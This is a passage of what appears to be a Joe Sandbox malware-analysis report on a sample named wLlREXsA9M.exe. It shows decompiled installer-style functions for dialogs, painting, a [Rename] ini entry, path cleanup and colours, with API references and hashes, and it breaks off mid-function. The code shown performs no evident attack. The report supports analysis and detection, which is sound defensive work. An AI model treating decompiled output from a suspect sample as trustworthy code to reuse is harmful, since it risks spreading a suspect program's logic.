							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4226a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423708, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423708, "true", 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41ecd4; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t103 =  *0x41f4e0; // 0x7746fc
					_t25 = _t103 + 0x14; // 0x774710
					_t112 = _t25;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), "true", 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00403F94(SendMessageA(GetDlgItem(_a4, 0x40a), "true", 0, 0) & 0x00000001);
					E00404345();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x422edc; // 0x776280
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x423738;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E00404086;
					E00403F72(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00403F72(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00403F94( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00403FA7(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x423710 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41ecd4 = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41ecd4 = 0;
					return 0;
				}
			}

0x004040cb
0x004041dd
0x004041f0
0x0040424c
0x0040424c
0x00404250
0x00404320
0x00404327
0x00404329
0x00404329
0x00404329
0x0040432f
0x0040432f
0x00404332
0x00000000
0x00404339
0x0040425e
0x00404260
0x00404263
0x0040426a
0x0040426c
0x00404273
0x00404275
0x00404278
0x0040427b
0x00404280
0x00404286
0x00404289
0x00404290
0x0040429e
0x004042b6
0x004042c9
0x004042d9
0x004042db
0x004042db
0x00404290
0x00404273
0x004042de
0x004042e5
0x00000000
0x004042e7
0x004042e7
0x004042ee
0x00000000
0x00000000
0x004042f0
0x004042f4
0x00404305
0x00404305
0x00404307
0x0040430b
0x00404319
0x00404319
0x00000000
0x0040431d
0x004042e5
0x004041f8
0x004041fb
0x00000000
0x00000000
0x00404203
0x00404209
0x00000000
0x00000000
0x0040420f
0x00404215
0x00404215
0x00404218
0x0040421b
0x00000000
0x00000000
0x0040423e
0x0040423e
0x00404240
0x00404242
0x00404247
0x00000000
0x004040d1
0x004040d1
0x004040d4
0x004040d9
0x004040db
0x004040ea
0x004040ea
0x004040f1
0x004040f4
0x004040f6
0x004040fb
0x00404104
0x0040410a
0x00404116
0x00404119
0x00404122
0x00404127
0x0040412a
0x0040412f
0x00404146
0x0040414d
0x00404160
0x00404163
0x00404178
0x0040417f
0x00404184
0x00404189
0x00404189
0x00404198
0x004041a7
0x004041b9
0x004041be
0x004041ce
0x004041d0
0x00000000
0x004041d6

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404146
GetDlgItem.USER32(00000000,000003E8), ref: 0040415A
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404178
GetSysColor.USER32(?), ref: 00404189
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404198
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041A7
lstrlenA.KERNEL32(?), ref: 004041AA
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004041B9
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004041CE
GetDlgItem.USER32(?,0000040A), ref: 00404230
SendMessageA.USER32(00000000), ref: 00404233
GetDlgItem.USER32(?,000003E8), ref: 0040425E
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040429E
LoadCursorA.USER32(00000000,00007F02), ref: 004042AD
SetCursor.USER32(00000000), ref: 004042B6
ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 004042C9
LoadCursorA.USER32(00000000,00007F00), ref: 004042D6
SetCursor.USER32(00000000), ref: 004042D9
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404305
SendMessageA.USER32(?,00000000,00000000), ref: 00404319

Strings

Call, xrefs: 00404289
N, xrefs: 0040424C
open, xrefs: 004042C1

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: 19aed5953881340c067a3799d2e250ac2ac12beccb4e4262064be72ac43b9476
Instruction ID: ebc9a8f0acb19c41eee67ef381f73910ae3e39dd077a2ff00902dd540ae5371b
Opcode Fuzzy Hash: 19aed5953881340c067a3799d2e250ac2ac12beccb4e4262064be72ac43b9476
Instruction Fuzzy Hash: A861C5B1A40209BFEB109F61DD45F6A7B79FB84705F108036FB04BA2D1C7B8A951CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423710;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x422f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423708;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
Instruction ID: a0b7ce50fec83efafeb16569406a1c152c04985fcf8b97c7298fc3655e55bd79
Opcode Fuzzy Hash: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
Instruction Fuzzy Hash: CD419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD6 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AD6(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				CHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyA(0x421a98, "NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameA( *(_t53 + 0x1c), 0x421e98, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x421698, "%s=%s\r\n", 0x421a98, 0x421e98);
						_t54 = _t53 + 0x10;
						E00405DAF(_t38, 0x421a98, 0x421e98, 0x421e98,  *((intOrPtr*)( *0x423710 + 0x128)));
						_t13 = E00405A00(0x421e98, "true", "true");
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc("true", _t43 + _t6);
							if(_t47 == 0 || E00405A78(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405965(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405965(_t39, _t22 + 0xa, 0x4093b0);
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E004059BB(_t25 + _t47, 0x421698, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405AA7(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405A00(_t45, 0, 1));
					_t13 = GetShortPathNameA(_t45, 0x421a98, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}

0x00405ad6
0x00405ae5
0x00405aeb
0x00405afc
0x00405b24
0x00405b2f
0x00405b33
0x00405b53
0x00405b5a
0x00405b64
0x00405b71
0x00405b76
0x00405b7b
0x00405b7f
0x00405b8e
0x00405b90
0x00405b9d
0x00405ba1
0x00405c3c
0x00000000
0x00405bb7
0x00405bc4
0x00405be8
0x00405bec
0x00405c0b
0x00405c0f
0x00405c0f
0x00405c11
0x00405c1a
0x00405c25
0x00405c30
0x00405c36
0x00000000
0x00405c36
0x00405bee
0x00405bf1
0x00405bfc
0x00405bf8
0x00405bfa
0x00405bfb
0x00405bfb
0x00405c03
0x00405c05
0x00000000
0x00405c05
0x00405bcf
0x00405bd5
0x00000000
0x00405bd5
0x00405ba1
0x00405b7f
0x00405afe
0x00405b09
0x00405b12
0x00405b16
0x00000000
0x00000000
0x00405b16
0x00405c47

APIs

lstrcpyA.KERNEL32(00421A98,NUL,?,00000000,?,00000000,00405C69,?,?), ref: 00405AE5
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C69,?,?), ref: 00405B09
GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405B12

Part of subcall function 00405965: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405975
Part of subcall function 00405965: lstrlenA.KERNEL32(00000000,?,00000000,00405BC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059A7

GetShortPathNameA.KERNEL32(00421E98,00421E98,00000400), ref: 00405B2F
wsprintfA.USER32 ref: 00405B4D
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,?,00421E98,?,?,?,?,?), ref: 00405B88
GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405B97
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCF
SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405C25
GlobalFree.KERNEL32(00000000), ref: 00405C36
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405C3D

Part of subcall function 00405A00: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\wLlREXsA9M.exe,80000000,00000003), ref: 00405A04
Part of subcall function 00405A00: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A26

Strings

[Rename], xrefs: 00405BB7, 00405BC9
NUL, xrefs: 00405ADF
%s=%s, xrefs: 00405B43

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: d0b3027ef6b6729443384411225f78b74e353092e57950ba2d6c15bf0c4c4ff6
Instruction ID: 9c5a8ee995725745fadb1d9fba5f8fa658ca1a0ea7fdeaf9d6a5fa815c2f867e
Opcode Fuzzy Hash: d0b3027ef6b6729443384411225f78b74e353092e57950ba2d6c15bf0c4c4ff6
Instruction Fuzzy Hash: 11312571A08B59ABD3206B215D48F6B3A5CDF85754F14013AFE01F62D2DA7CAC018EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FF8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040586C(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E0040582A("*?|<>/\":", _t5))) == 0) {
							E004059BB(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405ffa
0x00406002
0x00406016
0x00406016
0x0040601c
0x00406029
0x00406029
0x0040602a
0x0040602c
0x00406030
0x00406032
0x0040603b
0x0040603d
0x00406057
0x0040605f
0x0040605f
0x00406064
0x00406066
0x00406068
0x0040606c
0x0040606d
0x00406070
0x00406078
0x0040607a
0x0040607e
0x00000000
0x00000000
0x00406084
0x00406089
0x00000000
0x00000000
0x00000000
0x00406089
0x0040608e

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\wLlREXsA9M.exe",75C43410,C:\Users\user\AppData\Local\Temp\,00000000,00403148,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 00406050
CharNextA.USER32(?,?,?,00000000), ref: 0040605D
CharNextA.USER32(?,"C:\Users\user\Desktop\wLlREXsA9M.exe",75C43410,C:\Users\user\AppData\Local\Temp\,00000000,00403148,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 00406062
CharPrevA.USER32(?,?,75C43410,C:\Users\user\AppData\Local\Temp\,00000000,00403148,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040335D), ref: 00406072

Strings

*?|<>/":, xrefs: 00406040
C:\Users\user\AppData\Local\Temp\, xrefs: 00405FF9
"C:\Users\user\Desktop\wLlREXsA9M.exe", xrefs: 00406034

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\wLlREXsA9M.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1724327227
Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction ID: c5a87e5a11d193e5031dae6931f811cbb81a26d216dd9bfcbd8fb6b368782190
Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction Fuzzy Hash: 7511346184439129FB329A380C40B777F884F96764F19047FE8C6322C2CABC5CA2966D

Uniqueness

Uniqueness Score: -1.00%

Function 00403FD9 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403FD9(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403feb
0x0040407f
0x00000000
0x0040407f
0x00403ffc
0x00404000
0x00000000
0x00000000
0x00404006
0x0040400f
0x00404012
0x00404012
0x00404018
0x0040401e
0x0040401e
0x0040402a
0x00404030
0x00404037
0x0040403a
0x0040403d
0x0040403f
0x0040403f
0x00404047
0x0040404d
0x0040404d
0x00404057
0x0040405c
0x0040405f
0x00404064
0x00404067
0x00404067
0x00404077
0x00404077
0x00000000

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403FF6
GetSysColor.USER32(00000000), ref: 00404012
SetTextColor.GDI32(?,00000000), ref: 0040401E
SetBkMode.GDI32(?,?), ref: 0040402A
GetSysColor.USER32(?), ref: 0040403D
SetBkColor.GDI32(?,?), ref: 0040404D
DeleteObject.GDI32(?), ref: 00404067
CreateBrushIndirect.GDI32(?), ref: 00404071

Memory Dump Source

Source File: 00000000.00000002.1030236900.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1030207147.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030289404.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030326621.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1030638407.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wLlREXsA9M.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: d0bcdc102b6d1dd0651a8e5db64b29fe8bc1b516b7bc7d9b25591c23a76aefab
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: CB216FB1904705ABCB319F78DD48F4BBBF8AF41714B048A29EA96B22E1D734E904CB55

Uniqueness

Uniqueness Score: -1.00%

Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100021FA(void* __edx, intOrPtr _a4) {
				signed int _v4;
				void* _t36;
				signed int _t37;
				void* _t38;
				void* _t47;
				signed int* _t49;
				signed int* _t50;
				void* _t51;

				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t50 = (_v4 << 5) + _t9;
					_t36 = _t50[6];
					if(_t36 == 0) {
						goto L9;
					}
					_t47 = 0x1a;
					if(_t36 == _t47) {
						goto L9;
					}
					if(_t36 != 0xffffffff) {
						if(_t36 <= 0 || _t36 > 0x19) {
							_t50[6] = _t47;
						} else {
							_t36 = E100012AD(_t36 - 1);
							L10:
						}
						goto L11;
					} else {
						_t36 = E1000123B();
						L11:
						_t51 = _t36;
						_t13 =  &(_t50[2]); // 0x820
						_t49 = _t13;
						if(_t50[1] != 0xffffffff) {
						}
						_t37 =  *_t50;
						_t50[7] = _t50[7] & 0x00000000;
						if(_t37 > 7) {
							L27:
							_t38 = GlobalFree(_t51);
							if(_v4 == 0) {
								return _t38;
							}
							if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v4 = _v4 + 1;
							} else {
								_v4 = _v4 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t37 * 4 +  &M10002380))) {
								case 0:
									 *_t49 =  *_t49 & 0x00000000;
									goto L27;
								case 1:
									__eax = E100012FE(__ebp);
									goto L20;
								case 2:
									 *__ebx = E100012FE(__ebp);
									 *((intOrPtr*)(__ebx + 4)) = __edx;
									goto L27;
								case 3:
									__eax = E10001224(__ebp);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebx = __eax;
									goto L27;
								case 4:
									 *0x1000405c =  *0x1000405c +  *0x1000405c;
